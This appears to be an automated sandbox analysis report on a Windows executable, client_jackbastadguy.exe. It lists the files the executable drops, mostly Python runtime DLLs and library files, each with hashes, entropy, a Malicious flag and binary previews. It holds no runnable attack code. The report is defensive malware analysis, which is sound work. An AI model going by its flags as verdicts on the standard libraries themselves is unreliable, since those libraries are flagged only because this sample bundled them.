                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.+.>.x.>.x.>.x.Fgx.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.>.x.>.xmL.y.>.x.D.y.>.x.D.y.>.x.D.x.>.x.D.y.>.xRich.>.x........................PE..d....K.b.........." ... .....<......0....................................................`.........................................0D..`....D..x....p.......`.......X...)...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_overlapped.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):48552
                                                                                                                                                                                                                                                  Entropy (8bit):6.319402195167259
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:9i4KJKYCKlBj7gKxwfZQ7ZlYXF1SVMHE4ftISstDYiSyvM+eEd2:hKJfBuAA1SVWBftISstD7Syti
                                                                                                                                                                                                                                                  MD5:7E6BD435C918E7C34336C7434404EEDF
                                                                                                                                                                                                                                                  SHA1:F3A749AD1D7513EC41066AB143F97FA4D07559E1
                                                                                                                                                                                                                                                  SHA-256:0606A0C5C4AB46C4A25DED5A2772E672016CAC574503681841800F9059AF21C4
                                                                                                                                                                                                                                                  SHA-512:C8BF4B1EC6C8FA09C299A8418EE38CDCCB04AFA3A3C2E6D92625DBC2DE41F81DD0DF200FD37FCC41909C2851AC5CA936AF632307115B9AC31EC020D9ED63F157
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|.K{8.%(8.%(8.%(1..(<.%(X.$):.%(X. )4.%(X.!)0.%(X.&);.%(\.$):.%(8.$(N.%(.$)=.%(.!)9.%(\.()9.%(\.%)9.%(\..(9.%(\.')9.%(Rich8.%(........PE..d....K.b.........." ... .>...X...... ................................................o....`..........................................w..X...(x...........................)...... ....V..T............................U..@............P...............................text....<.......>.................. ..`.rdata...4...P...6...B..............@..@.data................x..............@....pdata..............................@..@.rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1164800
                                                                                                                                                                                                                                                  Entropy (8bit):7.05748889255336
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:8RgySc2phTzucZzdcZ7fUoPTS4ObanoVen42fw5I:BySc2ptScvkosfcI
                                                                                                                                                                                                                                                  MD5:E4761848102A6902B8E38F3116A91A41
                                                                                                                                                                                                                                                  SHA1:C262973E26BD9D8549D4A9ABF4B7AE0CA4DB75F0
                                                                                                                                                                                                                                                  SHA-256:9D03619721C887413315BD674DAE694FBD70EF575EB0138F461A34E2DD98A5FD
                                                                                                                                                                                                                                                  SHA-512:A148640AA6F4B4EF3AE37922D8A11F4DEF9ECFD595438B9A36B1BE0810BFB36ABF0E01BEE0AA79712AF0D70CDDCE928C0DF5057C0418C4ED0D733C6193761E82
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....^..........0..........p.............................................. .........................................+....................p...'...........................................P..(...................d................................text....].......^..................`.P`.data........p.......b..............@.`..rdata..p............d..............@.`@.pdata...'...p...(...R..............@.0@.xdata..L,...........z..............@.0@.bss....h.............................`..edata..+...........................@.0@.idata..............................@.0..CRT....X...........................@.@..tls................................@.@..reloc..............................@.0B........................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_queue.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):30632
                                                                                                                                                                                                                                                  Entropy (8bit):6.41055734058478
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:lez/Dt36r34krA4eVIS7UAYiSyvAEYeEdSiD:leDE34krA4eVIS7UA7Sy9YLD
                                                                                                                                                                                                                                                  MD5:23F4BECF6A1DF36AEE468BB0949AC2BC
                                                                                                                                                                                                                                                  SHA1:A0E027D79A281981F97343F2D0E7322B9FE9B441
                                                                                                                                                                                                                                                  SHA-256:09C5FAF270FD63BDE6C45CC53B05160262C7CA47D4C37825ED3E15D479DAEE66
                                                                                                                                                                                                                                                  SHA-512:3EE5B3B7583BE1408C0E1E1C885512445A7E47A69FF874508E8F0A00A66A40A0E828CE33E6F30DDC3AC518D69E4BB96C8B36011FB4EDEDF9A9630EF98A14893B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~Zb...b...b...k..`.......`.......n.......j.......a.......a.......`...b...+.......c.......c.......c.......c...Richb...........................PE..d....K.b.........." ... .....8.......................................................F....`..........................................C..L....C..d....p.......`.......N...)..........`4..T........................... 3..@............0..(............................text............................... ..`.rdata..2....0......................@..@.data...x....P.......:..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_socket.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):77736
                                                                                                                                                                                                                                                  Entropy (8bit):6.247935524153974
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:C6DucXZAuj19/s+S+pjtk/DDTaVISQwn7SyML:C6DPXSuj19/sT+ppk/XWVISQwneL
                                                                                                                                                                                                                                                  MD5:E137DF498C120D6AC64EA1281BCAB600
                                                                                                                                                                                                                                                  SHA1:B515E09868E9023D43991A05C113B2B662183CFE
                                                                                                                                                                                                                                                  SHA-256:8046BF64E463D5AA38D13525891156131CF997C2E6CDF47527BC352F00F5C90A
                                                                                                                                                                                                                                                  SHA-512:CC2772D282B81873AA7C5CBA5939D232CCEB6BE0908B211EDB18C25A17CBDB5072F102C0D6B7BC9B6B2F1F787B56AB1BC9BE731BB9E98885C17E26A09C2BEB90
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...ry..ry..ry..{.g.ty......py.......y......zy......qy......py..ry...y......uy......sy......sy......sy......sy..Richry..................PE..d....K.b.........." ... .l.......... &.......................................P.......Q....`.............................................P...P........0....... ..l........)...@.........T...............................@............................................text...Rj.......l.................. ..`.rdata...s.......t...p..............@..@.data...............................@....pdata..l.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_sqlite3.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):97704
                                                                                                                                                                                                                                                  Entropy (8bit):6.173518585387285
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:GzgMWYDOavuvwYXGqijQaIrlIaiP9NbTp9c4L7ZJkyDpIS5Qux7Syce:NFYqDPSQaIrlI/DbLc2tJkyDpIS5QuxZ
                                                                                                                                                                                                                                                  MD5:7F61EACBBBA2ECF6BF4ACF498FA52CE1
                                                                                                                                                                                                                                                  SHA1:3174913F971D031929C310B5E51872597D613606
                                                                                                                                                                                                                                                  SHA-256:85DE6D0B08B5CC1F2C3225C07338C76E1CAB43B4DE66619824F7B06CB2284C9E
                                                                                                                                                                                                                                                  SHA-512:A5F6F830C7A5FADC3349B42DB0F3DA1FDDB160D7E488EA175BF9BE4732A18E277D2978720C0E294107526561A7011FADAB992C555D93E77D4411528E7C4E695A
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........dQ...?...?...?..}....?..>...?......?..:...?..;...?..<...?..>...?.;w>...?...>...?..2...?..?...?......?..=...?.Rich..?.................PE..d....L.b.........." ... ............................................................4.....`.............................................P....................`.......T...)..............T...............................@...............`............................text...n........................... ..`.rdata...p.......r..................@..@.data...,....@......................@....pdata.......`.......2..............@..@.rsrc................F..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\_ssl.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):159144
                                                                                                                                                                                                                                                  Entropy (8bit):6.002098953253968
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:UhIDGtzShE3z/JHPUE0uev5J2oE/wu3rE923+nuI5Piev9muxISt710Y:UhIqtzShE3zhvyue5EMnuaF9mu3
                                                                                                                                                                                                                                                  MD5:35F66AD429CD636BCAD858238C596828
                                                                                                                                                                                                                                                  SHA1:AD4534A266F77A9CDCE7B97818531CE20364CB65
                                                                                                                                                                                                                                                  SHA-256:58B772B53BFE898513C0EB264AE4FA47ED3D8F256BC8F70202356D20F9ECB6DC
                                                                                                                                                                                                                                                  SHA-512:1CCA8E6C3A21A8B05CC7518BD62C4E3F57937910F2A310E00F13F60F6A94728EF2004A2F4A3D133755139C3A45B252E6DB76987B6B78BC8269A21AD5890356AD
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........dI...'L..'L..'L.}.L..'L..&M..'L.."M..'L..#M..'L..$M..'L..&M..'Lz|&M..'L..&Lt.'L)w&M..'L..*M..'L..'M..'L...L..'L..%M..'LRich..'L................PE..d....K.b.........." ... ............l*...................................................`............................................d...4........`.......P.......D...)...p..<.......T...............................@............................................text...x........................... ..`.rdata..J...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..<....p.......6..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):880490
                                                                                                                                                                                                                                                  Entropy (8bit):5.683339619799521
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:jEHYKmIpWyxC6Sacp28A4a2YN6dOVwx/fpE4YrESLMNM6:jEHYoVxMLa2SDVwx/fpE4YbMNM6
                                                                                                                                                                                                                                                  MD5:93C00A7C6FC6EE7047A74C9D1F9DE865
                                                                                                                                                                                                                                                  SHA1:50D205C9683AA67A61E7A8C0ACDEA3819A011FA1
                                                                                                                                                                                                                                                  SHA-256:4B8B736328C992053A402681AE99A11CC17731D50FE3F9DBE79D6D58103D54D0
                                                                                                                                                                                                                                                  SHA-512:79817D7051C31B772FAB62BCA914A36C04FE4EF6E8453E5278806284CD6F13AFAD3615EC19DDEF225432A532449FDE559E1386A453B6AADC4B0BEB352646F72E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PK..........!...v............_collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\certifi\cacert.pem

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):299427
                                                                                                                                                                                                                                                  Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                                  MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                                  SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                                  SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                                  SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md.cp310-win_amd64.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                  Entropy (8bit):4.82516630102953
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:700fK74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFOCQAASmHcX6g8H4ao:QFCk2z1/t12iwU5usJFqCyVcqgg
                                                                                                                                                                                                                                                  MD5:F4F7F634791F26FC62973350D5F89D9A
                                                                                                                                                                                                                                                  SHA1:6BE643BD21C74ED055B5A1B939B1F64B055D4673
                                                                                                                                                                                                                                                  SHA-256:45A043C4B7C6556F2ACFC827F2FF379365088C3479E8EE80C7F0A2CEB858DCC6
                                                                                                                                                                                                                                                  SHA-512:4325807865A76427D05039A2922F853287D420BCEBDA81F63A95BF58502E7DA0489060C4B6F6FFD65AA294E1E1C1F64560ADD5F024355922103C88B2CF1FD79B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................X...................................^............................4...........Rich....................PE..d...c#.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\charset_normalizer\md__mypyc.cp310-win_amd64.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):122368
                                                                                                                                                                                                                                                  Entropy (8bit):5.903697891709302
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:5ewkbk74PoxchHGTm/SCtg5MbfFPjPNoSLn2dkp2A/2pQKP:5endPox6HGTOLtg6bfFhDLkkCpQK
                                                                                                                                                                                                                                                  MD5:47EE4516407B6DE6593A4996C3AE35E0
                                                                                                                                                                                                                                                  SHA1:293224606B31E45B10FB67E997420844AE3FE904
                                                                                                                                                                                                                                                  SHA-256:F646C3B72B5E7C085A66B4844B5AD7A9A4511D61B2D74153479B32C7AE0B1A4C
                                                                                                                                                                                                                                                  SHA-512:EFA245C6DB2AEE2D9DB7F99E33339420E54F371A17AF0CF7694DAF51D45AEBFBAC91FC52DDB7C53E9FC73B43C67D8D0A2CAA15104318E392C8987A0DAD647B81
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........VyR.7...7...7...O...7.......7...O...7.......7.......7.......7..JB...7...7..b7......7......7......7......7..Rich.7..........PE..d...b#.g.........." ...).6...........7.......................................0............`......................................... ...d.................................... ......@...................................@............P...............................text...(4.......6.................. ..`.rdata...Y...P...Z...:..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:pip.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\METADATA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5724
                                                                                                                                                                                                                                                  Entropy (8bit):5.120429897887076
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:DlkQIUQIhQIKQILbQIRIaMPktjaVMxsxA2ncEvGDfe0HEdwGArNZG0JQTQCQx5Kw:dcPuPwsrcEvGDfe0HENA5w0JQTQ9x59H
                                                                                                                                                                                                                                                  MD5:526D9AC9D8150602EC9ED8B9F4DE7102
                                                                                                                                                                                                                                                  SHA1:DBA2CB32C21C4B0F575E77BBCDD4FA468056F5E3
                                                                                                                                                                                                                                                  SHA-256:D95F491ED418DC302DB03804DAF9335CE21B2DF4704587E6851EF03E1F84D895
                                                                                                                                                                                                                                                  SHA-512:FB13A2F6B64CB7E380A69424D484FC9B8758FA316A7A155FF062BFDACDCA8F2C5D2A03898CD099688B1C16A5A0EDCECFC42BF0D4D330926B10C3FCE9F5238643
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Metadata-Version: 2.3.Name: cryptography.Version: 44.0.0.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\RECORD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16380
                                                                                                                                                                                                                                                  Entropy (8bit):5.58935582120211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:hXr1We/l45jEVeK6tkhX/v4WJr6W51HepPNIq+NX6ih5VBUqw8q:hXzlMEVdX/9Jr6W51HepPN/+96ihI8q
                                                                                                                                                                                                                                                  MD5:F15EF7175220C9F59F90BBBAEDA16DBD
                                                                                                                                                                                                                                                  SHA1:5367CAC8814D7A54E1C0274FF3F651ED5C6FE5D6
                                                                                                                                                                                                                                                  SHA-256:04DB3839C853D4164576122B7D5A2BAB186536DC8F9A4980385E11CF59946114
                                                                                                                                                                                                                                                  SHA-512:BB0FA967E03D98B9611006DF2155BD8AD58A0E8B1A679D636B94CE931D316F18B61B801E018DECA90D8E5A35FA744AE8C9E1A36F25C791052008C43AF53A8117
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:cryptography-44.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-44.0.0.dist-info/METADATA,sha256=2V9JHtQY3DAtsDgE2vkzXOIbLfRwRYfmhR7wPh-E2JU,5724..cryptography-44.0.0.dist-info/RECORD,,..cryptography-44.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-44.0.0.dist-info/WHEEL,sha256=Hn9bytZpOGoR6M4U5xUTHC1AJpPD9B1xPrM4STxljEU,94..cryptography-44.0.0.dist-info/licenses/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-44.0.0.dist-info/licenses/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-44.0.0.dist-info/licenses/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=fcUqF1IcadxBSH0us1vCvob0OJOrPV3h30yZD8wsHo4,445..cryptography/__init__.py,sha256=XsRL_PxbU6UgoyoglAgJQSrJCP97ovBA8YIEQ2-uI68,762..cryptography/__pycache__/__about__.cpython-310.pyc,,..cryptography/__pycache__/__init__.cpython-310

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\WHEEL

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):94
                                                                                                                                                                                                                                                  Entropy (8bit):5.0373614967294325
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:RtEeX5pG6vhP+tkKciH/KQb:RtvoKWKTQb
                                                                                                                                                                                                                                                  MD5:A868F93FCF51C4F1C25658D54F994349
                                                                                                                                                                                                                                                  SHA1:535C88A10911673DEABB7889D365E81729E483A6
                                                                                                                                                                                                                                                  SHA-256:1E7F5BCAD669386A11E8CE14E715131C2D402693C3F41D713EB338493C658C45
                                                                                                                                                                                                                                                  SHA-512:EC13CAC9DF03676640EF5DA033E8C2FAEE63916F27CC27B9C43F0824B98AB4A6ECB4C8D7D039FA6674EF189BDD9265C8ED509C1D80DFF610AEB9E081093AEB3D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Wheel-Version: 1.0.Generator: maturin (1.7.5).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info\licenses\LICENSE

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):197
                                                                                                                                                                                                                                                  Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
